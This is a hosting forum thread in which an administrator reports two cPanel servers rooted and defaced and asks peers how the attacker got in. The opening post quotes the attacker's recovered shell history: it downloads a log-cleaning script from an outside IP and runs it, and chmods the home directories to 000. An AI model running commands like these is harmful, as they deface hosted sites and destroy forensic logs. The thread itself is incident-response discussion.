Got 2 Cpanel Servers hacked... root gained, anyone know HOW they did?

cass

Well-Known Member
Jul 17, 2002
349
0
166
Argentina/USA/Mexico
On two completly different cpanel servers, the same hacker or team gained access... (from morocco)
Anyone had an idea how can this be possible?
The two servers were up2date (cpanel and OS), one of it had CSF/LFD (5.32) as well as hardened in many ways, the other doesn´t had CSF, but was running suPHP.
In both the SSH was running on non standard ports.

We already saw more than one with the same issue....
they basically... chmod 000 /home, and edit /usr/local/apache/conf/includes/errordocument.conf the 403 line, to show an hacked html, that is shown on all websites running on the server. Then they run a "log cleaner".

First I thought it could be the CSF bug ... but one of the server doesn´t had it, and the other had it updated already...
We were looking around, and found the attacker IP (41.140.*) was like logged on the whm (per apache logs)...
but we can´t still determine HOW they got the root access.... both servers were updated, and running smooth since the beggining... so we´re afraid it could be a BUG that could affect other clients too.
I´m not telling it´s a cpanel bug... I´m trying to find someone that could actually KNOW what they did, as most logs/history was deleted on this server, we found
Part of the History (as we logged in fast to the server, before they leave) was this:
14 cd /tmp
15 w
16 wget 41.140.110.54/log
17 pico /usr/local/apache/conf/includes/errordocument.conf
18 service httpd restart
19 ls -la /
20 chmod 000 /homechmod 000 /home
21 chmod 000 /home
22 chmod 000 /homechmod 000 /home2
23 chmod 000 /home2
24 perl log
25 perl log
(this last command is the one that clear logs, and they just gone)
But could see they got the file, what file they edited, etc.
looks like this is the only damage done, but if this is bug, they can actually do anything they want, as they were working as ROOT!

BTW similar problem found recently here:
https://forums.cpanel.net/f5/hacking-attempt-problem-help-210052.html
 

k-planethost

Well-Known Member
Sep 22, 2009
199
10
68
Athens Greece
i suggest you hire a server admin for an hour or more to investigate further your issue.
Answering from this forum how they gain root access is difficult without logs
Recompiled Kernel, Secured /tmp & /dev/shm install mod sec with got root rules, firewall , disable functions on php, recompile php with suhosin,there are various of security methods to implement on your boxes.
 

BigLebowski

Well-Known Member
Dec 24, 2007
75
0
56
Were the kernels fully patched? There have been several root vulnerabilities over the years. I've seen lots of boxes plundered that way. Also did you have brute force checking on ? If you look at the logs you will normally see thousands of passwords tried over several days if CSF is not enabled and blocking.

Dude
 

cass

Well-Known Member
Jul 17, 2002
349
0
166
Argentina/USA/Mexico
Yes brute force enabled (both csf and cpanel) also mod security.
kernel not patched (last centos kernel installed).
 

Infopro

Well-Known Member
May 20, 2003
17,076
523
613
Pennsylvania
cPanel Access Level
Root Administrator
Twitter
Assuming you have CSF set to stop and block failed logins after 5 attempts, and you have no record of failed attempts (or do you?) then we might want to consider the user with root password to that server might have some sort of issue locally. This sort of thing does happen where a users computer is compromised somehow and passwords pulled from plain txt files where passwords may be stored for FTP clients. For example filezilla.

There was a very long thread on this topic a while back on these forums that discussed this sort of thing.